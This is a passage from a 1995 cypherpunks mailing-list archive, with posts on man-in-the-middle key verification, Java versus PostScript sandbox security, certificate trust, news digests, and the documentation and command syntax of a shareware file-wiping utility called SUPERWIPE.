5.  Working an identifier of your public key into conversation so that
Mitch can't edit out your public key without changing the whole
conversation.  (E.g. "I talked to her a number of times equal to the
least significant 4 bits of my public key."  This is an example which
Mitch could easily handle, by replacing "a number ... key" with "3
times", but it gives you the idea.)


All of these can involve psychological maneuvers, like "informal
coding".  That is, trying to sneak some information by Mitch that he
*should* edit if he knew what was good for him, but he doesn't
realize it.  This gets really interesting, trying to communicate 
something to your actual recipient without letting Mitch realize what 
you are communicating.

The "tell me [something only you would know]" game is a good example of
that.


I think method 4 is the best method.  Method 1 is more reliable, but
much more expensive and I have a strong aversion to making it necessary
for everyone to publicize their True Name.  I don't know if method 5 
is even feasible.  :-)

Of course, there is no reason not to use many different methods
simultaneously.


Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Mon, 9 Oct 95 22:36:21 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: java security concerns
In-Reply-To: <199510100457.AAA00235@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.90.951010002834.2770A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


I am sorry, I don't follow your logic. You find Postscript files
safe because you can set up the interpreter to ignore Postscript commands
to write to files and execute programs (check the CIAC alerts), yet
you find Java applets insecure even when you can set up the same
restrictions and more under HotJava (and hopefully Netscape)?
That does not compute. Granted, Java is certainly more complex than Postscript;
it is a generic programming language, and will be used by more people.
But that same concept applies.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Tue, 10 Oct 1995, Perry E. Metzger wrote:

> Postscript is completely safe if the interpreter is emasculated, and
> most of them are. (It is a huge risk when run on a non-emasculated
> interpreter, but fortunately it is easy to castrate one of the things.)
> 
> Java isn't like that, unfortunately. I wish it was simply a
> display-postscript like thing that built pretty pictures inside a
> confined window -- I could trust that to be done right if it was done
> carefully.
> 
> Perry
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 10 Oct 95 00:37:16 PDT
To: cypherpunks@toad.com
Subject: Re: java security concerns
Message-ID: <199510100737.AAA21881@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:15 AM 10/10/95 -0400, Ray wrote:
>  There is a large class of Java apps that need no file i/o capability.
>99% of all Java apps on the web right now don't save any persistent state 

While file I/O, especially file writes, are certainly a major concern,
network capability is also critical - and I would guess that most of the
interesting applets aren't just animated Christmas trees and image advertising -
they'll be things to help you fill out a form correctly and send it in,
or have buttons that say "order me".  If they can issue outgoing messages
of their own, they can spam, and they can send worms.

> But it's still unclear whether those lack "i/o capabilities",
>given that some postscript printers run operating systems and tcp/ip stacks

Unlike network-equipped PS printers, which are a relatively small fraction
of the market, and which usually don't get requests from the outside world
sent to them through firewalls, we're talking about something that will be
in Netscape, where anybody who clicks a button on anything on the web can
download an executable page...  It's a bit hard for network printers to find
each other in most places; it's much easier for Netscape sessions to do so.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Mon, 9 Oct 95 21:42:35 PDT
To: cypherpunks@toad.com
Subject: Re: java security concerns
In-Reply-To: <199510100051.RAA03799@infinity.c2.org>
Message-ID: <199510100442.AAA10517@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



  I think to require formally proven implementation for something
like Java is simply unreasonable. Even if it were possible. The
whole computer market, and for that matter, most of the market as a
whole, relies on "unproven" products. Most of what you buy and use is
based on a notion of "quality" which is merely an inductive argument
that the product had no problems in the past. Every time you buy a piece
of software and use it, you risk your security. Every time you ftp
something off the net and run it, you are taking that risk. How do you know 
MS Word doesn't have security holes or trojan horses built in, have you 
seen the source? Software always has bugs, holes, and security flaws. It 
always will. If we were to require each new generation of software to be
"formally correct", software would never evolve. There is an important
feedback process between customers, software companies, and even
hackers, that drives software towards higher quality. Perfect software
implementations proven correct by mathematics are a pipe dream. Maybe
you can have higher confidence in small, simple software -- I've heard
Negroponte expressing that nostalgia for the days of word processors
that ran in 32k of ram, but frankly, I'm glad those days are gone.

   Will the IPv6 and IPSEC stack implementations be formally proven 
correct?   

  Yes, it may be possible that exploiting holes in Java will be easier
than those in sendmail, just as it is easier to exploit a hole in 
software on a networked machine rather than a non-networked one. But this
can not be an argument against Java or its utility. The same arguments
were raised when Postscript first came out, yet the huge benefits
of postscript are obvious, while the amount of security damage
done by it is minimal. Java will have lots of holes. It will go through
the same evolutionary progress that all software does. Sendmail was
given a chance to evolve, I think Java deserves the same
chance, given its potential.

-Ray








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Mon, 9 Oct 95 21:50:34 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Java bugs found?
In-Reply-To: <199510100349.XAA20771@book.hks.net>
Message-ID: <199510100450.AAA12123@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> So much for guaranteed security. There is one question on my mind. Why do
> today's programs have to try to do it all? Why the heck does a
> wordprocessor have to ship with a compiler built in? Not to mention that

  Possibly because it makes applications a lot more usable if they are
extensible.

-Ray



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 9 Oct 95 21:58:03 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: java security concerns
In-Reply-To: <199510100442.AAA10517@clark.net>
Message-ID: <199510100457.AAA00235@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Ray Cromwell writes:
>   Yes, it may be possible that exploiting holes in Java will be easier
> than those in sendmail, just as it is easier to exploit a hole in 
> software on a networked machine rather than a non-networked one. But this
> can not be an argument against Java or its utility. The same arguments
> were raised when Postscript first came out, yet the huge benefits
> of postscript are obvious, while the amount of security damage
> done by it is minimal.

Postscript is completely safe if the interpreter is emasculated, and
most of them are. (It is a huge risk when run on a non-emasculated
interpreter, but fortunately it is easy to castrate one of the things.)

Java isn't like that, unfortunately. I wish it was simply a
display-postscript like thing that built pretty pictures inside a
confined window -- I could trust that to be done right if it was done
carefully.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 9 Oct 95 21:58:08 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Java bugs found?
In-Reply-To: <199510100042.UAA24769@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.91.951010005428.16914B-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Netscape pulled all the 2.0 betas that supported Java yesterday,
> due to a recently discovered Java security hole.  So the 32 bit
> Windows versions, SunOS, Solaris and SGI versions were removed.
> There was a README explaining this there last night, but I can't
> find it today.

What am I bid for this rare n32e20b1.exe downloaded Saturday night.  An 
instant classic at 2.6 megs.

DCF 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Mon, 9 Oct 95 23:39:54 PDT
To: cypherpunks@toad.com
Subject: [NOISE] was Re: java security concerns
Message-ID: <199510100639.BAA19818@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain



This is a bit off-topic, but hopefully interesting.

Rather than trying to prove a program to be correct (which I agree is doomed
to failure for the foreseeable future for all but trivial programs), perhaps
it would be useful to have an automated theorem-prover to try to deduce
"interesting things" about certain programs such as "this program always
bounds-checks its input", "this program allows writes to arbitrary files on
lines x, y, and z", "this program halts". (:>)  Obviously (as the last example
illustrates), this isn't perfect because something can be true without being
provable.  Further, it's likely that assumptions must be made about system
calls, libraries, and the ways in which they interact.  There's also the
problem of "who proves the prover".  However, I think such a tool would be
useful because it may quickly point out things not obvious to (most) humans
and getting some idea of what can't be deduced and why would be instructive.


                          | (Douglas) Hofstadter's Law:
Frank Stuart              | It always takes longer than you expect, even 
fstuart@vetmed.auburn.edu | when you take into account Hofstadter's Law.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 9 Oct 95 22:48:05 PDT
To: Aleph One <aleph1@dfw.net>
Subject: Re: java security concerns
In-Reply-To: <Pine.SUN.3.90.951010002834.2770A-100000@dfw.net>
Message-ID: <199510100547.BAA00623@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Aleph One writes:
> I am sorry, I don't follow your logic. You find Postscript files
> safe because you can set up the interpreter to ignore Postscript commands
> to write to files and execute programs (check the CIAC alerts), yet
> you find Java applets insecure even when you can set up the same
> restrictions and more under HotJava (and hopefully Netscape)?
> That does not compute.

Yes it does.

To (perhaps over)simplify my point, the Java interpreter cannot be
stripped of all i/o capabilities and still remain useful. I can
physically remove all the "dangerous" calls from a Postscript
interpreter and still have it be useful.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Mon, 9 Oct 95 23:16:10 PDT
To: perry@piermont.com
Subject: Re: java security concerns
In-Reply-To: <199510100547.BAA00623@jekyll.piermont.com>
Message-ID: <199510100615.CAA00389@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> Aleph One writes:
> > I am sorry, I don't follow your logic. You find Postscript files
> > safe because you can set up the interpreter to ignore Postscript commands
> > to write to files and execute programs (check the CIAC alerts), yet
> > you find Java applets insecure even when you can set up the same
> > restrictions and more under HotJava (and hopefully Netscape)?
> > That does not compute.
> 
> Yes it does.
> 
> To (perhaps over)simplify my point, the Java interpreter cannot be
> stripped of all i/o capabilities and still remain useful. I can
> physically remove all the "dangerous" calls from a Postscript
> interpreter and still have it be useful.

  There is a large class of Java apps that need no file i/o capability.
99% of all Java apps on the web right now don't save any persistent state 
information. I couldn't find any Java apps on the Java page that
used file i/o.  If by "stripped of i/o capabilities", you mean
that the Java interpreter is not permitted to ever call open/read/write,
not even to read in files it needs like config/preferences files or 
dynamically linked libraries, I'd say that's absurd. There's not many 
things that can be stripped of such capabilities, including postscript
interpreters, except for those which run the interpreter straight
out of rom. But it's still unclear whether those lack "i/o capabilities",
given that some postscript printers run operating systems and tcp/ip
stacks, and it is feasible for the interpreter to crash and execute
an i/o call. However, the Java interpreter can certainly be compiled
to not allow Java applets to ever do disk or network i/o. It doesn't
even take a recompile. Just delete the file i/o class.  

  It is certainly possible, to within a high degree of confidence,
to "box in" all i/o calls, especially if they are run in a separate
process. 

-Ray







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Mon, 9 Oct 95 23:18:01 PDT
To: frissell@panix.com (Duncan Frissell)
Subject: Re: Java bugs found?
In-Reply-To: <Pine.SUN.3.91.951010005428.16914B-100000@panix.com>
Message-ID: <199510100617.CAA00753@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> > 
> > Netscape pulled all the 2.0 betas that supported Java yesterday,
> > due to a recently discovered Java security hole.  So the 32 bit
> > Windows versions, SunOS, Solaris and SGI versions were removed.
> > There was a README explaining this there last night, but I can't
> > find it today.
> 
> What am I bid for this rare n32e20b1.exe downloaded Saturday night.  An 
> instant classic at 2.6 megs.

  Hehe, I dunno, but whatever you're asking, I'll undercut you as I have
it also. Unless you'd like to start an oligarchy. Let's talk. ;-)


-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stanton McCandlish <mech@eff.org>
Date: Tue, 10 Oct 95 00:30:41 PDT
To: cypherpunks@toad.com
Subject: UK key escrow effort?
Message-ID: <199510100730.DAA03927@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Anyone heard anything about this?  Please email me direct if you have info.
TTYL.

--
<A HREF="http://www.eff.org/~mech/">          Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>       Online Activist           



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Tue, 10 Oct 95 02:48:16 PDT
To: cypherpunks@toad.com
Subject: PC disk wipe software - SUPERWIPE 1.04R
Message-ID: <199510101324.IAA14089@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


     PC disk wipe software -  SUPERWIPE 1.04R

Note: SUPERWIPE is also a SUPER ERASER with powerful erase features.


   As a matter of fact, I have written a shareware program that is a PC
wipe program: SUPERWIPE 1.04R . I just sent a copy to Perry Metzger. If
anyone else wants a copy, let me know. It's free to Cypherpunks.

   There are two big problems with writing a PC disk wipe program.
1. Compressed disks. With compressed disks you don't know how long to
make the write. You try putting all 1's or all 0's and the disk compressor
will compress it next to nothing. In fact, it may write the wipe data to
different clusters than the original file. 2. Software disk caches and
even worse -  hardware disk caches. - Those 256k disk caches. With caches,
if you do multi-wipes of a file, in actuality, you only do one real wipe
& several virtual (to RAM) wipes.

   It might be possible to get around the first problem by using direct
sector writes (INT 13 SERVICE 3) instead of well behaved (INT 21 SERVICE
40) writes. But this is a rather dangerous practice as if you make a
mistake you might wreck the hard disk partition.

   Concerning the second, I see no practical way around the problem of
hardware disk caches keeping the user from making multiple wipes of a
file.

   As for making multiple wipes of CURRENTLY unused disk space, my SUPER-
WIPE will do that with the options:  /oldx /n   . Where oldx points at the
diskette drive or hard disk partition to be wiped & /n tells how many
wipes to do (1-9).

   As for the problem of getting rid of old buffer data writes to the end
of last file cluster writes, my program doesn't handle that. However, if
there is no disk compressor, I don't think it would be that hard to write
a function to handle it. In reality, I don't think that this problem is
much of a problem anyway. It would only occur at the end of small files.

   I suspect that the wipe problems that we have with the DOS operating
system are shared with most other operating systems.

   I uploaded SUPERWIPE to an anon ftp site. I believe it was Alex De
Joode (or spelled something like that) who gave approval for the upload.
It seems like it was a Utopia site. I lost my file on it and have now for-
gotten. If anyone needs SUPERWIPE, send me a request.

Some documentation follows for SUPERWIPE 1.04R:

-------------Start of readme.spr file---------------------------------

              SUPERWIPE
   current version: 1.04r



   SUPERWIPE is a utility that will substantially increase the security of
your computer. What does SUPERWIPE do? In order to explain what it does, I
first need to explain some security holes in the DOS operating system as
it works with disks.

   The delete & erase DOS instructions are convenient utilities that allow
you to get rid of old files. They don't actually destroy the files. They
merely mark these files so that they will be ignored by the DOS operating
system. Most of the time this is good enough. But what if you have sensi-
tive files that must not be recovered? A snoop could use the popular DOS
undelete command or another utility program to entirely recover these
files.

   To solve this problem, wipe programs were invented. A wipe program will
write a character, usually a 0 or a 1, over your entire file & then delete
it. In this way, your sensitive files are made non-recoverable.

NOTE: SUPERWIPE currently only works with non-compressed disks.

    SUPERWIPE also does this but with some improvements! SUPERWIPE
(unregistered) will enable you to :



1. allow multiple files to be wiped instead of just one!

2. use wildcards!

3. mix your regular files with wildcards in any order you choose!
 Multiple wildcards may be interspersed with multiple regular files!

4. reduce your file to zero bytes, so that a snoop cannot determine with
   certainty what the original size was!

5. rename your file to a single letter, so that a snoop cannot determine
   what the original name was!

6. access several disk partitions (c: d: e: etc..) & diskette drives in
   one run!

7. starting with version 1.03, SUPERWIPE now has SUPER ERASE capabilities
   as well.

   All of the above capabilities are contained in this program.


 

         ADVANTAGES OF REGISTRATION FOLLOW:

   When you register, you will receive a registered version, that in
 addition to the above capabilities, will allow you to:

1: Wipe out all previously erased or deleted files! (The /OLD option.)

   The registered version will also have a nicer execution message that
 will lack the plea for money.

   You are probably wondering why you would want the capability to wipe
out all previously deleted files. There are two reasons: one fairly
obvious; one not.

   Firstly, those old deleted files may be sensitive & you forgot to wipe
them properly. Or maybe, you were busy at an earlier time & did not take
the time to properly wipe all the sensitive files. Or, you may not
remember whether you wiped or erased a sensitive file. With the /OLD option,
you can be sure that they are all wiped!

   Secondly, many programs, including some word processors, make temporary
files that are used to assist that program in its work. When the program
is done, those programs are deleted. Ordinarily, this is fine, but it does
leave a security hole. The /OLD option will wipe out all of them!

Note: Since the /OLD option must go through the entire "unused" disk
partition or diskette, it may take several minutes to complete.

2.   Registered users, will also be notified of improved versions of
SUPERWIPE.

3.   Upgrades, at least for the next upgrade, will only be $10.

4.   Registered users will also receive telephone support.


5.   Also, the registered user will have a clear conscience & will use
SUPERWIPE with a feeling of sublime legitimacy!

   Site licenses are also available.

-------------End of readme.spr file---------------------------------



-------------Start of .com help file------------------------------------
Gary's super file wipe/erase program. ver.  1.04r   Copyright 1995 Gary Jeffers
This ver. does not work with compressed disks.


Nothing to do.

Invocation syntax    w filename1 filename2  ... wildcard1 wildcard2 ...
 /(no. of wipes for disk) /n(one alpha letter name of alternate file)
 /old{partition or drive letter} - (wipe all old deletes.-reg. only)

/e for regular ERASE mode only - NO wipes.

no parenthesis or braces in actual command line.

The order of the tokens does not matter.
examples:    w my.fil new.fil /olda *.exe next????.com /5 /na
w this.fil /e wild????.exe /nc anot????.com second.fil
w that????.* /nk last.fil /oldc

-------------End of .com help file------------------------------------




THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY.
The United States "Federal" Government - We'll be even more American
without it.

                                           PUSH EM BACK! PUSH EM BACK!
                                           WWWAAAYYYY  BBBAAACCCCK!
                                           BBBEEEAAATTTT  STATE!

                                           Gary Jeffers






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 10 Oct 95 03:22:23 PDT
To: cypherpunks@toad.com
Subject: Re: java security concerns
In-Reply-To: <199510100457.AAA00235@jekyll.piermont.com>
Message-ID: <9510101020.AA21924@all.net>
MIME-Version: 1.0
Content-Type: text


Perry writes:
> Ray Cromwell writes:
> >   Yes, it may be possible that exploiting holes in Java will be easier
> > than those in sendmail, just as it is easier to exploit a hole in 
> > software on a networked machine rather than a non-networked one. But this
> > can not be an argument against Java or its utility. The same arguments
> > were raised when Postscript first came out, yet the huge benefits
> > of postscript are obvious, while the amount of security damage
> > done by it is minimal.
> 
> Postscript is completely safe if the interpreter is emasculated, and
> most of them are. (It is a huge risk when run on a non-emasculated
> interpreter, but fortunately it is easy to castrate one of the things.)

I'm not clear on what you mean by emasculated.  It seems to me that
postscript interpreters are full of holes that can be exploited by
a clever enough attacker.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 10 Oct 95 03:44:37 PDT
To: rjc@clark.net (Ray Cromwell)
Subject: Re: java security concerns
In-Reply-To: <199510100442.AAA10517@clark.net>
Message-ID: <9510101042.AA22924@all.net>
MIME-Version: 1.0
Content-Type: text


>   I think to require formally proven implementation for something
> like Java is simply unreasonable. Even if it were possible. The
> whole computer market, and for that matter, most of the market as a
> whole, relies on "unproven" products. Most of what you buy and use is
> based on a notion of "quality" which is merely an inductive argument
> that the product had no problems in the past. Every time you buy a piece
> of software and use it, you risk your security. Every time you ftp
> something off the net and run it, you are taking that risk. How do you know 
> MS Word doesn't have security holes or trojan horses built in, have you 
> seen the source? Software always has bugs, holes, and security flaws. It 
> always will. If we were to require each new generation of software to be
> "formally correct", software would never evolve. There is an important
> feedback process between customers, software companies, and even
> hackers, that drives software towards higher quality. Perfect software
> implementations proven correct by mathematics is a pipe dream. Maybe
> you can have higher confidence in small, simple software -- I've heard
> Negroponte expressing that nostalgia for the days of word processors
> that ran in 32k of ram, but frankly, I'm glad those days are gone.

What you miss is the distinction between different kinds of programs and
their protection implications.

	Networking programs with unintended flaws may allow outsiders
	to gain access to your internal network and do harm.

	Non-networking programs with unintended flaws may fail to operate
	properly or act as a vector for the spread of corruption, but
	they don't give outsiders unlimited insider access without insiders
	somehow facilitating the process.

That's why we are far more concerned about networking programs than about
word processors.

	In terms of word processors with Trojan horses, we don't want
them either, but there's a big difference between a Trojan horse and the
ability to spread a virus.  Viruses can spread whenever there is sharing
and general purpose programming.  Hence, most modern spreadsheets, word
processors, Postscript interpreters, etc. allow viruses to spread.

	A big problem with remote auto-execution is that it allows
someone not authorized to use your computer to decide to run a program on
it.  This may make you the unwitting vector for a virus, cause your
system to crash, etc.  With auto-execution, the web turns from a
networked read-only database with limited searching capabilities into a
giant distributed processor in which the users have little or no control
over what their computers are used for.

The battle is for control over your own computer and what it does.

>    Will the IPv6 and IPSEC stack implementations be formally proven 
> correct?   
>
>   Yes, it may be possible that exploiting holes in Java will be easier
> than those in sendmail, just as it is easier to exploit a hole in 
> software on a networked machine rather than a non-networked one. But this
> can not be an argument against Java or its utility. The same arguments
> were raised when Postscript first came out, yet the huge benefits
> of postscript are obvious, while the amount of security damage
> done by it is minimal. Java will have lots of holes. It will go through
> the same evolutionary progress that all software does. Sendmail was
> given a chance to evolve, I think Java deserves the same
> chance, given its potential.

I don't see any huge benefits to postscript.  In fact, postscript files
are essentially impossible to search for items of interest, to display
on a normal video screen, to quote from without reentering the data, etc.

The point is, do we want to turn the Web into a distributed computing
environment in which anyone can execute any code on anyone else's
computers?

	Don't assume I am against it - after all, I was the only vocal
	proponent of viral computing for almost 5 years and got
	vilified for it plenty of times. 

I am in favor of making the decision consciously, not by accident or
ignorance, and providing proper protection mechanisms.  If the question
of Hot Java is asked in terms of permitting all computers using the Web
to become part of a global viral computing environment, I am ready to
hear the answer.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 10 Oct 95 04:03:15 PDT
To: cypherpunks@toad.com
Subject: LOG_rea
Message-ID: <199510101103.HAA04498@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-10-95. NYPaper:


   "Deleted, but Not Gone or Forgotten."

      Files produced by Microsoft Office Windows applications,
      including Word, Excel, Powerpoint and Access, often
      incorporate chunks of data previously deleted from the
      disk on which the files were saved. Microsoft said the
      problem was solved in earlier versions of Microsoft Word
      but that it has recurred in the new version for Windows
      95. Third-party programmers report another security
      lapse. Word offers optional password protection by
      encryption. The encryption, however, does not extend to
      "objects" within the file.


   "Chip Maker Introduces a Chip for Super Use and for
   Modems."

      One of the most closely watched Silicon Valley start-up
      companies plans on Tuesday to disclose details of an
      ambitious computer chip that it hopes will one day be
      used in everything from cable modems to supercomputers.
      Microunity Systems Engineering Inc. said its chips would
      be able to process information 10 times faster than
      today's personal computer microprocessors. The chip will
      consist of 10.5 million transistors and will process
      data at a gigahertz, or a billion operations a second.
      It is designed so that it can process information in
      parallel and will be capable of issuing up to four
      128-bit-wide instructions simultaneously.


   2: LOG_rea  (10 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Tue, 10 Oct 95 05:44:46 PDT
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: Certificate proposal
In-Reply-To: <9510092311.AA27677@alpha>
Message-ID: <9510101243.AA28296@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Scott Brickner writes:
 > I disagree.  The MITM is foiled by one successful communication. 

I'm going to need some clarification of this; what is meant by
"successful"?  If you mean "a communication without a MITM
participating", and presuming also that that communication would
involve a key validation, then I suppose it's true.  However, I don't
see how this success can be evaluated if the parties do not have
nearly complete control over the communications substrate.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Tue, 10 Oct 95 05:58:25 PDT
To: "Don M. Kitchen" <don@cs.byu.edu>
Subject: Re: Certificate proposal
In-Reply-To: <9510091715.AA27991@alpha>
Message-ID: <9510101258.AA28275@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Don M. Kitchen writes:
 > >  If we are forced to exchange keys remotely, then perhaps some sort of
 > >  "proof" techniques could be used to establish to some level of
 > >  assurance that the remote entity I *think* is you is really you.  Or
 > 
 > So who is Pr0duct Cypher then? And why should I have to produce ID saying 
 > my name is Don, unless I'm proving my Real Name[tm] is Don.

Right.  If we're forced to exchange keys remotely, I just have to deal
with the possibility that I'm being spoofed.

 > >  you could provide me with a key, and then I could poll a list of
 > >  references to inquire as to the "goodness" of the key.  This seems to
 > 
 > But there's no way to prove that there's no MITM. But "middle" is a
 > subjective term.

Yes, that's why I put "proof" in quotes.  I guess I meant "demonstrate
to a personally sufficient level of satisfaction".

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Tue, 10 Oct 95 06:02:10 PDT
To: perry@piermont.com
Subject: Re: java security concerns
In-Reply-To: <Pine.SUN.3.90.951010002834.2770A-100000@dfw.net>
Message-ID: <9510101301.AA28597@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Perry E. Metzger writes:
 > To (perhaps over)simplify my point, the Java interpreter cannot be
 > stripped of all i/o capabilities and still remain useful. 

?!?  What if all I give you is a couple of Java classes that write to
a frame buffer, and that frame buffer is the screen (or your 24-pin
dot matrix printer or whatever)?

 > I can
 > physically remove all the "dangerous" calls from a Postscript
 > interpreter and still have it be useful.

I don't see the difference.  An interpreter is an interpreter.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 10 Oct 95 05:31:45 PDT
To: cypherpunks@toad.com
Subject: NOD_out
Message-ID: <199510101231.IAA11016@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-10-95. W$Japer:


   A long front page lead nodder on the burgeoning "space race"
   to build global satellite telecommunications systems, for
   video, phone, data and other transactional bile.

   A related gagger on "media processors," a new generation of
   chips -- for video, graphics, on-line services, wireless
   data, telephone and audio -- being developed by MicroUnity,
   Chromatic Research, IBM and TriMedia. This is a more
   comprehensive pack-o-lies of the NYPaper spitter today on
   MicroUnity.


   NOD_out  (28 kb in 2 parts)











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 10 Oct 95 09:06:08 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <199510100721.AAA20956@ix.ix.netcom.com>
Message-ID: <199510101604.JAA17611@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart <stewarts@ix.netcom.com> writes:

>As far as privacy goes, this set of keys and certifications lets you create
>private communications (using signed DH, etc.) with the entity that owns
>the private key for Bank Account X.  No, you don't know if that entity
>is really Alice or really MITM; in fact you don't know Alice's name, if it's
>done right.  You just know that the Bank says it will honor requests for money
>from Bank Account X (assuming you know where to find the Bank, which is a
>separate but similar problem.)  So assuming you're selling politically correct
>widgets and not pharmaceuticals or financial privacy consulting services,
>you probably don't
>care too much about who's on the other end - the person who's giving you
>the money is the person you want to be talking to.

Still, there is a problem here: how did the bank know that it _should_
honor requests to withdraw money from bank account x if they are signed
with a certain key?  How did it determine that that is a valid key, if it
never had a secure channel to the person opening the account?  I think
the answer is clearly that it cannot, that it must have had a secure
channel.  Would a certificated key presented by Alice have been
sufficient to create such a channel, do you think, or would a face to
face meeting have been necessary?  (Or would an uncertificated key be
adequate?)

>In the case of the Bank, the reason you trust the Bank isn't that you know
>them physically (though it was interesting when I started dealing with a
>local bank where the tellers knew me by name after only two or three visits);
>knowing your local Savings and Loan by name doesn't guarantee you can get any
>money out of them if there's a bank run, nor does it really guarantee that they
>won't embezzle the funds and head for Argentina.  The reason you trust them
>is that they (in this case the "they" identified by their key) are doing
>business dealings with a lot of people and it's more profitable not to abscond.
>And the reason you know it's really the Bank and not MITM is that they've
>always identified themselves by their key from the beginning.
>Just like the credit card whose owner we've been calling Alice has.
>And because you've successfully withdrawn money from the Bank before,
